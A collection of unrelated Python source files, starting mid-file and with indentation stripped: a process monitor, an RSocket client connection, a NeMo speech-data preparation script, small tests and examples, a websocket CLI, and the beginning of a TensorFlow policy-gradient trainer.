:data_item: The data item to insert
"""
self.logger.debug("In thread:%s", threading.get_ident())
with self.lock:
if not self.consumer_thread:
self.consumer_thread = threading.Thread(name="consumer_thread", target=self.consumer_loop)
self.consumer_thread.start()
self.queue.put([table_name, data_item])
def validate_connection(self):
"""
Making sure that there is a valid connection to the database registered on this thread
"""
if self.database_connection:
if threading.get_ident() != self.stored_thread_id:
self.disconnect()
self.connect()
else:
self.connect()
def connect(self):
"""
Setting a connection to the database
"""
self.logger.debug("Connecting database")
self.stored_thread_id = threading.get_ident()
self.database_connection = dataset.connect(self.db_location_uri)
def disconnect(self):
"""
Closing the connection after finishing using it
"""
# This is a hack to handle SqlAlchemy pooling connections and then being angry that they are not being accessed from the same thread
self.logger.debug("Disconnecting database")
self.database_connection.engine.dispose()
self.database_connection = None
self.stored_thread_id = None
def clean(self):
"""
Cleanup: Stopping the consumer thread
"""
with self.lock:
if self.consumer_thread:
self.queue.put(None)
self.consumer_thread.join()
self.consumer_thread = None
self.logger.debug("Finished cleanup")
class SingleProcessMonitor(object):
"""Document statistics for a given PID process"""
def __init__(self, pid_of_process):
"""
Initialization
:pid_of_process: The pid of the process
"""
self.logger = logging.getLogger(LOGGER_NAME)
self.pid = pid_of_process
self.creation_timestamp = datetime.datetime.now()
self.process_info = None
self.username = None
self.cmdline = None
try:
self.process_info = psutil.Process(pid_of_process)
self.username = self.process_info.username()
self.cmdline = self.process_info.cmdline()
except psutil.NoSuchProcess:
self.logger.info("Failed getting initial data for process:%s", pid_of_process)
def snapshot_process(self):
"""
Taking a snapshot of processs statistics
:returns: Dictionary with the process data
"""
data = {}
now = datetime.datetime.now()
if self.process_info:
try:
data["timestamp"] = now
data["time_since_tracking_start"] = (now - self.creation_timestamp).total_seconds()
data["Username"] = self.username
data["PID"] = self.pid
data["exec_name"] = self.cmdline[0]
data["cmdline"] = " ".join(self.cmdline)
data["cpu_percent"] = self.process_info.cpu_percent()
data["total_reserved_memory"] = self.process_info.memory_info()[0]
data["memory_percent"] = self.process_info.memory_percent()
except psutil.NoSuchProcess:
self.logger.info("Couldn't snapshot process with id:%s. cmline:\"%s\"", self.pid, self.cmdline)
return data
class ProcessesMonitor(object):
"""Monitor processes statistics by a given string"""
def __init__(self, process_string, database_manager, poll_time=DEFAULT_POLL_TIME):
self.logger = logging.getLogger(LOGGER_NAME)
self.process_string = process_string
self.database_manager = database_manager
self.poll_time = poll_time
self._timer = None
self.already_running = False
self.should_loop = False
self.current_pids = set()
self.process_monitors = {}
def loop(self):
"""Used to block execution while monitoring
"""
while self.should_loop:
time.sleep(1)
def snaptshot_all_processes(self):
"""
Snapshotting all existing processes
"""
self.logger.debug("Snapshotting data of: %s", self.current_pids)
data = {}
for pid in self.current_pids:
data[pid] = self.process_monitors[pid].snapshot_process()
for pid, data_item in data.items():
if data_item:
self.database_manager.insert_to_db(str(pid) + "_" + data_item["exec_name"], data_item)
def _run(self):
"""
Main loop function for the code execution
"""
self.logger.debug("Running _run")
if self.should_loop:
self.logger.debug("Entered main logic")
# Get list of existing processes according to the string
child = subprocess.Popen(["pgrep", self.process_string], stdout=subprocess.PIPE, shell=False)
result = child.communicate()[0]
pid_result = set([int(pid) for pid in result.split()])
new_pids = pid_result - self.current_pids
self.current_pids = pid_result
if new_pids:
self.logger.info("Will start monitoring these new PIDs %s", new_pids)
# For each new PID create a new SingleProcessMonitor
for new_pid in new_pids:
self.logger.debug("Creating SingleProcessMonitor for PID: %s", new_pid)
self.process_monitors[new_pid] = SingleProcessMonitor(new_pid)
self.snaptshot_all_processes()
# Must be at end of _run function to create execution loop
if self.should_loop:
self.logger.debug("Calling _run again")
self._timer = threading.Timer(self.poll_time, self._run)
self._timer.start()
def start(self):
"""
Starts the monitoring of the process
"""
self.logger.debug("Running start")
if not self.already_running:
self.should_loop = True
self.already_running = True
self._timer = threading.Timer(self.poll_time, self._run)
self._timer.start()
def stop(self):
"""
Stopping process monitoring
"""
self.should_loop = False
self._timer.cancel()
def clean(self):
"""
Place holder for a clean function
"""
if self.already_running:
self.already_running = False
self.should_loop = False
self._timer.join()
self.logger.debug("Finished cleanup")
def set_logging(logger_name):
"""Setting the logger configuration for a given name
:logger_name: TODO
:returns: TODO
"""
# log_file_location = r"." + os.sep + time.strftime('%Y-%m-%d-%H-%M-%S') + ".log"
# log_level = logging.INFO
log_level = logging.DEBUG
logging.basicConfig(level=log_level,
format='%(asctime)s - %(name)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(logger_name)
formatter = logging.Formatter('%(asctime)s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
# Multiplexing log lines
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
console_handler.setLevel(log_level)
# file_handler = logging.FileHandler(log_file_location, mode='w')
# file_handler.setFormatter(formatter)
# file_handler.setLevel(logging.INFO)
# logger.addHandler(file_handler)
logger.info("Logger was set")
return logger
def clean_logger_handlers(logger):
"""
Clean the handlers saved into a logger
"""
logger_clean_list = [logger.removeHandler(x) for x in logger.handlers]
if logger_clean_list:
print(logger_clean_list)
def print_usage():
"""Prints usage """
print("""Monitors searches for processes with names containing a\n \
given string and monitors those processes statistics continuously\n""".format(sys.argv[0]))
print ("Usage:")
print("\t{} -h - Displays this help message".format(sys.argv[0]))
print("\t{} process_string [poll_time_in_seconds(default=5)] - Start monitoring data".format(sys.argv[0]))
print("\t{} -e - Exports data from database to csv files".format(sys.argv[0]))
def main():
"""
Main function:
Checks arguments and calls main logic
"""
numargs = len(sys.argv)
if HELP_ARGS_NUMBER == numargs and "-h" == sys.argv[1]:
print_usage()
elif EXPORT_ARGS_NUMBER == numargs and "-e" == sys.argv[1]:
logger = set_logging(LOGGER_NAME)
try:
data_exporter = DataExporter(DATABASE_LOCATION)
data_exporter.export()
except Exception as exception_object:
raise exception_object
finally:
clean_logger_handlers(logger)
elif numargs >= MIN_ARGS_COUNT and numargs <= MAX_ARGS_COUNT:
process_string = sys.argv[1]
poll_time = DEFAULT_POLL_TIME
try:
poll_time = float(sys.argv[2])
except ValueError:
print("Value for polling is not a number")
print_usage()
return
except IndexError:
pass
logger = set_logging(LOGGER_NAME)
database_manager = DatabaseManager(DATABASE_LOCATION)
monitor = ProcessesMonitor(process_string, database_manager, poll_time)
monitor.start()
try:
monitor.loop()
logger.info("ProcessesMonitor has stopped working")
monitor.stop()
logger.info("Quitting ProcessesMonitor")
except KeyboardInterrupt:
logger.info("Quitting ProcessesMonitor")
monitor.stop()
finally:
monitor.stop()
monitor.clean()
database_manager.clean()
logger.debug("Main about to exit thread id:%s", threading.get_ident())
clean_logger_handlers(logger)
else:
print_usage()
if __name__ == "__main__":
main()
|
client_connection.py | from .abstract_connection import AbstractConnection
from ..transport import AbstractTransport
from ..frames import SetupFrame, Frame_ABC, ErrorFrame, ErrorCodes
from ..common import RSocketConfig
from .keepalive_support import KeepaliveSupport
import threading
import rx
import rx.subject
from queue import PriorityQueue
import logging
class PriorityEntry(object):
def __init__(self, priority, data):
self.data = data
self.priority = priority
def __lt__(self, other):
return self.priority < other.priority
class ClientConnection(AbstractConnection):
def __init__(self, transport: AbstractTransport, config: RSocketConfig):
super().__init__()
self._log = logging.getLogger("rsockets2.connection.ClientConnection")
self._transport = transport
self._config = config
self._keepalive_support: KeepaliveSupport = None
self._send_thread = threading.Thread(
name="RSocket-Client-Send-Thread", daemon=True, target=self._send_loop)
self._recv_thread = threading.Thread(
name="RSocket-Client-Recv-Thread", daemon=True, target=self._recv_loop)
self._running = False
self._send_queue = PriorityQueue()
self._recv_subject = rx.subject.Subject()
def open(self):
self._running = True
self._transport.connect()
self._recv_thread.start()
self._negotiate_connection()
self._send_thread.start()
def _negotiate_connection(self):
setupFrame = SetupFrame.from_config(self._config)
self._transport.send_frame(setupFrame)
self._keepalive_support = KeepaliveSupport(self, self._config)
self._keepalive_support.start()
def queue_frame(self, frame: Frame_ABC):
if frame.stream_id == 0:
self._send_queue.put(PriorityEntry(10, frame))
else:
self._send_queue.put(PriorityEntry(100, frame))
def recv_observable(self):
return self._recv_subject
def destroy_observable(self):
return self._destroy_publisher
def close(self):
self._running = False
if self._keepalive_support != None:
self._keepalive_support.stop()
self._destroy_publisher.on_completed()
self._transport.disconnect()
def _send_loop(self):
try:
while self._running:
try:
data = self._send_queue.get().data
self.increase_send_position(len(data))
self._transport.send_frame(data)
except Exception as error:
if self._running != False:
raise error
else:
self._log.debug(
"Silent socket error because its already closed.", exc_info=True)
except Exception as err:
if self._running == True:
self.close()
self._log.debug(
"Error in send_loop: {}".format(err), exc_info=True)
else:
self._log.error(
"Error in send_loop: {}".format(err), exc_info=True)
def _recv_loop(self):
try:
while self._running:
try:
frame = self._transport.recv_frame()
self.increase_recv_position(len(frame))
self._recv_subject.on_next(frame)
except Exception as error:
if self._running != False:
raise error
else:
self._log.debug(
"Silent socket error because its already closed.", exc_info=True)
except Exception as err:
self._recv_subject.on_error(err)
if self._running == True:
self.close()
self._log.debug(
"Error in recv_loop: {}".format(err), exc_info=True)
else:
self._log.error(
"Error in recv_loop: {}".format(err), exc_info=True)
|
prepare_data.py | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import multiprocessing
import os
import re
from pathlib import Path
from typing import List
import regex
import scipy.io.wavfile as wav
from normalization_helpers import LATIN_TO_RU, RU_ABBREVIATIONS
from num2words import num2words
from nemo.collections import asr as nemo_asr
try:
from nemo_text_processing.text_normalization.normalize import Normalizer
NEMO_NORMALIZATION_AVAILABLE = True
except (ModuleNotFoundError, ImportError):
NEMO_NORMALIZATION_AVAILABLE = False
parser = argparse.ArgumentParser(description="Prepares text and audio files for segmentation")
parser.add_argument("--in_text", type=str, default=None, help='Path to a text file or a directory with .txt files')
parser.add_argument("--output_dir", type=str, required=True, help='Path to output directory')
parser.add_argument("--audio_dir", type=str, help='Path to folder with .mp3 or .wav audio files')
parser.add_argument(
"--audio_format", type=str, default='.mp3', choices=['.mp3', '.wav'], help='Audio files format in --audio_dir'
)
parser.add_argument('--sample_rate', type=int, default=16000, help='Sampling rate used during ASR model training')
parser.add_argument(
'--language', type=str, default='eng', choices=['eng', 'ru', 'add other languages supported by num2words.']
)
parser.add_argument(
'--cut_prefix', type=int, default=0, help='Number of seconds to cut from the beginning of the audio files.',
)
parser.add_argument(
'--model', type=str, default='QuartzNet15x5Base-En', help='Pre-trained model name or path to model checkpoint'
)
parser.add_argument('--min_length', type=int, default=0, help='Min number of chars of the text segment for alignment.')
parser.add_argument(
'--max_length', type=int, default=100, help='Max number of chars of the text segment for alignment.'
)
parser.add_argument(
'--additional_split_symbols',
type=str,
default='',
help='Additional symbols to use for \
sentence split if eos sentence split resulted in sequence longer than --max_length. '
'Use "|" as a separator between symbols, for example: ";|:" ',
)
parser.add_argument(
'--use_nemo_normalization',
action='store_true',
help='Set to True to use NeMo Normalization tool to convert numbers from written to spoken format.',
)
def convert_audio(in_file: str, wav_file: str = None, sample_rate: int = 16000) -> str:
"""
Convert .mp3 to .wav and/or change sample rate if needed
Args:
in_file: Path to .mp3 or .wav file
sample_rate: Desired sample rate
Returns:
path to .wav file
"""
print(f"Converting {in_file} to .wav format with sample rate {sample_rate}")
if not os.path.exists(in_file):
raise ValueError(f'{in_file} not found')
if wav_file is None:
wav_file = in_file.replace(os.path.splitext(in_file)[-1], f"_{sample_rate}.wav")
os.system(
f'ffmpeg -i {in_file} -acodec pcm_s16le -ac 1 -af aresample=resampler=soxr -ar {sample_rate} {wav_file} -y'
)
return wav_file
def process_audio(in_file: str, wav_file: str = None, cut_prefix: int = 0, sample_rate: int = 16000):
"""Process audio file: .mp3 to .wav conversion and cut a few seconds from the beginning of the audio
Args:
in_file: path to the .mp3 or .wav file for processing
wav_file: path to the output .wav file
cut_prefix: number of seconds to cut from the beginning of the audio file
sample_rate: target sampling rate
"""
wav_audio = convert_audio(str(in_file), wav_file, sample_rate)
if cut_prefix > 0:
# cut a few seconds of audio from the beginning
sample_rate, signal = wav.read(wav_audio)
wav.write(wav_audio, data=signal[cut_prefix * sample_rate :], rate=sample_rate)
def split_text(
in_file: str,
out_file: str,
vocabulary: List[str] = None,
language='eng',
remove_brackets=True,
do_lower_case=True,
min_length=0,
max_length=100,
additional_split_symbols=None,
use_nemo_normalization=False,
):
"""
Breaks down the in_file roughly into sentences. Each sentence will be on a separate line.
Written form of the numbers will be converted to its spoken equivalent, OOV punctuation will be removed.
Args:
in_file: path to original transcript
out_file: path to the output file
vocabulary: ASR model vocabulary
language: text language
remove_brackets: Set to True if square [] and curly {} brackets should be removed from text.
Text in square/curly brackets often contains inaudible fragments like notes or translations
do_lower_case: flag that determines whether to apply lower case to the in_file text
min_length: Min number of chars of the text segment for alignment. Short segments will be combined to be
at least min_length (not recommended for multi speaker data).
max_length: Max number of chars of the text segment for alignment
additional_split_symbols: Additional symbols to use for sentence split if eos sentence split resulted in
segments longer than --max_length
use_nemo_normalization: Set to True to use NeMo normalization tool to convert numbers from written to spoken
format. Normalization using num2words will be applied afterwards to make sure there are no numbers present
in the text, otherwise they will be replaced with a space and that could deteriorate segmentation results.
"""
print(f'Splitting text in {in_file} into sentences.')
with open(in_file, "r") as f:
transcript = f.read()
# remove some symbols for better split into sentences
transcript = (
transcript.replace("\n", " ")
.replace("\t", " ")
.replace("…", "...")
.replace("\\", " ")
.replace("--", " -- ")
.replace(". . .", "...")
.replace("‘", "’")
)
# remove extra space
transcript = re.sub(r' +', ' ', transcript)
transcript = re.sub(r'(\.+)', '. ', transcript)
if remove_brackets:
transcript = re.sub(r'(\[.*?\])', ' ', transcript)
# remove text in curly brackets
transcript = re.sub(r'(\{.*?\})', ' ', transcript)
lower_case_unicode = ''
upper_case_unicode = ''
if language == 'ru':
lower_case_unicode = '\u0430-\u04FF'
upper_case_unicode = '\u0410-\u042F'
elif language not in ['ru', 'eng']:
print(f'Consider using {language} unicode letters for better sentence split.')
# remove space in the middle of the lower case abbreviation to avoid splitting into separate sentences
matches = re.findall(r'[a-z' + lower_case_unicode + ']\.\s[a-z' + lower_case_unicode + ']\.', transcript)
for match in matches:
transcript = transcript.replace(match, match.replace('. ', '.'))
# find phrases in quotes
with_quotes = re.finditer(r'“[A-Za-z ?]+.*?”', transcript)
sentences = []
last_idx = 0
for m in with_quotes:
match = m.group()
match_idx = m.start()
if last_idx < match_idx:
sentences.append(transcript[last_idx:match_idx])
sentences.append(match)
last_idx = m.end()
sentences.append(transcript[last_idx:])
sentences = [s.strip() for s in sentences if s.strip()]
# Read and split transcript by utterance (roughly, sentences)
split_pattern = f"(?<!\w\.\w.)(?<![A-Z{upper_case_unicode}][a-z{lower_case_unicode}]\.)(?<![A-Z{upper_case_unicode}]\.)(?<=\.|\?|\!|\.”|\?”\!”)\s"
new_sentences = []
for sent in sentences:
new_sentences.extend(regex.split(split_pattern, sent))
sentences = [s.strip() for s in new_sentences if s.strip()]
def additional_split(sentences, split_on_symbols, max_length):
if len(split_on_symbols) == 0:
return sentences
split_on_symbols = split_on_symbols.split('|')
def _split(sentences, delimiter, max_length):
result = []
for s in sentences:
if len(s) <= max_length:
result.append(s)
else:
split_sent = s.split(delimiter)
result.extend([s + delimiter for s in split_sent[:-1]] + [split_sent[-1]])
return result
another_sent_split = []
for sent in sentences:
split_sent = [sent]
for delimiter in split_on_symbols:
split_sent = _split(split_sent, delimiter + ' ', max_length)
another_sent_split.extend(split_sent)
sentences = [s.strip() for s in another_sent_split if s.strip()]
return sentences
sentences = additional_split(sentences, additional_split_symbols, max_length)
# check to make sure there will be no utterances for segmentation with only OOV symbols
vocab_no_space_with_digits = set(vocabulary + [i for i in range(10)])
vocab_no_space_with_digits.remove(' ')
sentences = [s for s in sentences if len(vocab_no_space_with_digits.intersection(set(s))) > 0]
if min_length > 0:
sentences_comb = []
sentences_comb.append(sentences[0])
# combines short sentence
for i in range(1, len(sentences)):
if len(sentences_comb[-1]) < min_length or len(sentences[i]) < min_length:
sentences_comb[-1] += ' ' + sentences[i].strip()
else:
sentences_comb.append(sentences[i].strip())
sentences = sentences_comb
sentences = [s.strip() for s in sentences if s.strip()]
# save split text with original punctuation and case
out_dir, out_file_name = os.path.split(out_file)
with open(os.path.join(out_dir, out_file_name[:-4] + '_with_punct.txt'), "w") as f:
f.write("\n".join(sentences))
# substitute common abbreviations before applying lower case
if language == 'ru':
for k, v in RU_ABBREVIATIONS.items():
sentences = [s.replace(k, v) for s in sentences]
if language == 'ru':
# replace Latin characters with Russian
for k, v in LATIN_TO_RU.items():
sentences = [s.replace(k, v) for s in sentences]
if language == 'eng' and use_nemo_normalization:
if not NEMO_NORMALIZATION_AVAILABLE:
raise ValueError(f'NeMo normalization tool is not installed.')
print('Using NeMo normalization tool...')
normalizer = Normalizer(input_case='cased')
sentences_norm = normalizer.normalize_list(sentences, verbose=False)
if len(sentences_norm) != len(sentences):
raise ValueError(f'Normalization failed, number of sentences does not match.')
sentences = '\n'.join(sentences)
# replace numbers with num2words
try:
p = re.compile("\d+")
new_text = ''
match_end = 0
for i, m in enumerate(p.finditer(sentences)):
match = m.group()
match_start = m.start()
if i == 0:
new_text = sentences[:match_start]
else:
new_text += sentences[match_end:match_start]
match_end = m.end()
new_text += sentences[match_start:match_end].replace(match, num2words(match, lang=language))
new_text += sentences[match_end:]
sentences = new_text
except NotImplementedError:
print(
f'{language} might be missing in "num2words" package. Add required language to the choices for the'
f'--language argument.'
)
raise
sentences = (
sentences.replace("’", "'")
.replace("»", '"')
.replace("«", '"')
.replace("\\", "")
.replace("”", '"')
.replace("„", '"')
.replace("´", "'")
.replace("-- --", "--")
.replace("--", " -- ")
.replace("’", "'")
.replace('“', '"')
.replace('“', '"')
.replace("‘", "'")
.replace('—', '-')
.replace("- -", "--")
.replace('`', "'")
.replace(' !', '!')
.replace(' ?', '?')
.replace(' ,', ',')
.replace(' .', '.')
.replace(' ;', ';')
.replace(' :', ':')
.replace('!!', '!')
.replace('--', '-')
.replace('“', '"')
.replace(', , ', ', ')
.replace('=', '')
)
allowed_punct = [',', '.', '?', '!', ':', ';', '-', '"', '(', ')']
# clean up normalized text and keep only allowed_punct and ASR vocabulary (lower and upper case)
symbols_to_remove = ''.join(
set(sentences).difference(set(vocabulary + [s.upper() for s in vocabulary] + ['\n'] + allowed_punct))
)
sentences_norm = sentences.translate(''.maketrans(symbols_to_remove, len(symbols_to_remove) * ' '))
with open(os.path.join(out_dir, out_file_name[:-4] + '_with_punct_normalized.txt'), "w") as f:
f.write(sentences_norm)
if do_lower_case:
sentences = sentences.lower()
# remove all OOV symbols
symbols_to_remove = ''.join(set(sentences).difference(set(vocabulary + ['\n'])))
sentences = sentences.translate(''.maketrans(symbols_to_remove, len(symbols_to_remove) * ' '))
# remove extra space
sentences = re.sub(r' +', ' ', sentences)
with open(out_file, "w") as f:
f.write(sentences)
if __name__ == '__main__':
args = parser.parse_args()
os.makedirs(args.output_dir, exist_ok=True)
text_files = []
if args.in_text:
vocabulary = None
if args.model is None:
print(f"No model provided, vocabulary won't be used")
elif os.path.exists(args.model):
asr_model = nemo_asr.models.EncDecCTCModel.restore_from(args.model)
vocabulary = asr_model.cfg.decoder.vocabulary
elif args.model in nemo_asr.models.EncDecCTCModel.get_available_model_names():
asr_model = nemo_asr.models.EncDecCTCModel.from_pretrained(args.model)
vocabulary = asr_model.cfg.decoder.vocabulary
else:
raise ValueError(
f'Provide path to the pretrained checkpoint or choose from {nemo_asr.models.EncDecCTCModel.get_available_model_names()}'
)
if os.path.isdir(args.in_text):
text_files = Path(args.in_text).glob(("*.txt"))
else:
text_files.append(Path(args.in_text))
for text in text_files:
base_name = os.path.basename(text)[:-4]
out_text_file = os.path.join(args.output_dir, base_name + '.txt')
split_text(
text,
out_text_file,
vocabulary=vocabulary,
language=args.language,
min_length=args.min_length,
max_length=args.max_length,
additional_split_symbols=args.additional_split_symbols,
use_nemo_normalization=args.use_nemo_normalization,
)
print(f'Processed text saved at {args.output_dir}')
if args.audio_dir:
if not os.path.exists(args.audio_dir):
raise ValueError(f'{args.audio_dir} not found. "--audio_dir" should contain .mp3 or .wav files.')
audio_paths = list(Path(args.audio_dir).glob(f"*{args.audio_format}"))
workers = []
for i in range(len(audio_paths)):
wav_file = os.path.join(args.output_dir, audio_paths[i].name.replace(args.audio_format, ".wav"))
worker = multiprocessing.Process(
target=process_audio, args=(audio_paths[i], wav_file, args.cut_prefix, args.sample_rate),
)
workers.append(worker)
worker.start()
for w in workers:
w.join()
print('Done.')
|
test_api.py | from pymem.api import get_summary
from multiprocessing import Process, Event
def test_get_summary():
def sleep_until_wake(e):
e.wait()
e = Event()
p = Process(target=sleep_until_wake, args=(e,))
p.start()
pid = p.pid
summary = get_summary(pid)
e.set()
p.join()
assert len(summary) == 4
assert set(summary.keys()) == set(["private", "shared", "total", "swap"])
def convert(value):
return float(value[:-4]) # remove unit. e.g '1.00 MiB' to '1.00'
private, shared, total, *_ = map(convert, summary.values())
assert abs(private + shared - total) <= 0.1
|
socketserver_echo_simple.py | #!/usr/bin/env python3
"""Echo server example for SocketServer
"""
#end_pymotw_header
import socketserver
class EchoRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
# Echo the back to the client
data = self.request.recv(1024)
self.request.send(data)
return
if __name__ == '__main__':
import socket
import threading
address = ('localhost', 0) # let the kernel assign a port
server = socketserver.TCPServer(address, EchoRequestHandler)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True) # don't hang on exit
t.start()
# Connect to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Send the data
message = 'Hello, world'.encode()
print('Sending : {!r}'.format(message))
len_sent = s.send(message)
# Receive a response
response = s.recv(len_sent)
print('Received: {!r}'.format(response))
# Clean up
server.shutdown()
s.close()
server.socket.close()
|
cli.py | import asyncio
import websockets
import multiprocessing
import json
import os
import shlex
from orchestration_manager import OrchestrationManager
from printer import ColorPrint
async def cli(host="localhost", port=80):
"CLI for Orchestration Manager"
def orchestration_manager() -> None:
"Orchestration Manager starter"
OrchestrationManager(port=port)
# Starting OrchestrationManager Websocket server process
server_process = multiprocessing.Process(target=orchestration_manager)
server_process.start()
printer = ColorPrint()
printer.loader_start()
await asyncio.sleep(2)
printer.loader_stop()
printer.info_viewer()
# Starting CLI
async with websockets.connect(f'ws://{host}:{port}', ping_interval=None) as websocket:
async def send(msg: str) -> None:
"Send message"
try:
await websocket.send(msg)
except websockets.ConnectionClosedOK:
print("Exception (1)")
except Exception as e:
print(f"Exception (2) : {e}")
async def fetch() -> None:
"Recevice message"
try:
await send(json.dumps({
"type": OrchestrationManager.CLICommand.FETCH
}))
message = await websocket.recv()
json_msg = json.loads(message)
if json_msg["payload"]:
printer.message_viewer(json_msg["payload"])
except websockets.ConnectionClosedOK:
print("Exception (3)")
except Exception as e:
print(f"Exception (4) : {e}")
await send(json.dumps({
"type": OrchestrationManager.ConnectionType.CLI
}))
while True:
try:
ColorPrint.print_pass("prompt", end=": ")
command = input()
if command:
args = shlex.split(command)
if "master" == args[0]:
if len(args) > 1:
request = {
"cmd": args[1],
"type": OrchestrationManager.CLICommand.ADMIN
}
else:
ColorPrint.print_fail("Missing arg(s)")
continue
else:
request = {
"cmd": command,
"type": OrchestrationManager.CLICommand.COMMAND
}
await send(json.dumps(request))
await fetch()
except KeyboardInterrupt:
ColorPrint.print_fail("\n\n Terminate \n")
server_process.terminate()
exit(1)
if __name__ == "__main__":
# Default
PORT = 7890
# env var
if "PORT" in os.environ:
PORT = int(os.environ["PORT"])
asyncio.run(cli(port=PORT))
|
train_pg.py | import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None
):
#========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
#========================================================================================#
with tf.variable_scope(scope):
# YOUR_CODE_HERE
# - input layer
net = [
tf.layers.dense(
inputs=input_placeholder,
units=size,
activation=activation
)
]
# - hidden layer
for _ in range(n_layers):
net.append(
tf.layers.dense(
inputs=net[-1],
units=size,
activation=activation
)
)
# - output layer
net.append(
tf.layers.dense(
inputs=net[-1],
units=output_size,
activation=output_activation
)
)
return net[-1]
def pathlength(path):
return len(path["reward"])
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, ac_dim, 'PolicyNet_Discrete',
n_layers=n_layers, size=size)
sy_sampled_ac = tf.reshape(tf.multinomial(sy_logits_na, 1), [-1])
sy_logprob_n = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=sy_ac_na, logits=sy_logits_na)
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, ac_dim, 'PolicyNet_Continuous',
n_layers=n_layers, size=size)
sy_logstd = tf.Variable(initial_value=tf.ones([ac_dim]),
dtype=tf.float32,
name='sample_std')
sy_sampled_ac = tf.random_normal(shape=tf.shape(sy_mean),
mean=sy_mean,
stddev=tf.exp(sy_logstd))
sy_logprob_n = - ( # NOTE: log-space, negate output!
tf.contrib.distributions.MultivariateNormalDiag(
loc=sy_mean, scale_diag=tf.exp(sy_logstd)) \
.log_prob(sy_ac_na)
)
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
loss = tf.reduce_mean(sy_logprob_n * sy_adv_n)
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
baseline_targets = tf.placeholder(shape=[None],
dtype=tf.float32,
name='baseline_targets')
baseline_loss = tf.nn.l2_loss(baseline_targets - baseline_prediction)
baseline_update_op = tf.train.AdamOptimizer(learning_rate) \
.minimize(baseline_loss)
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
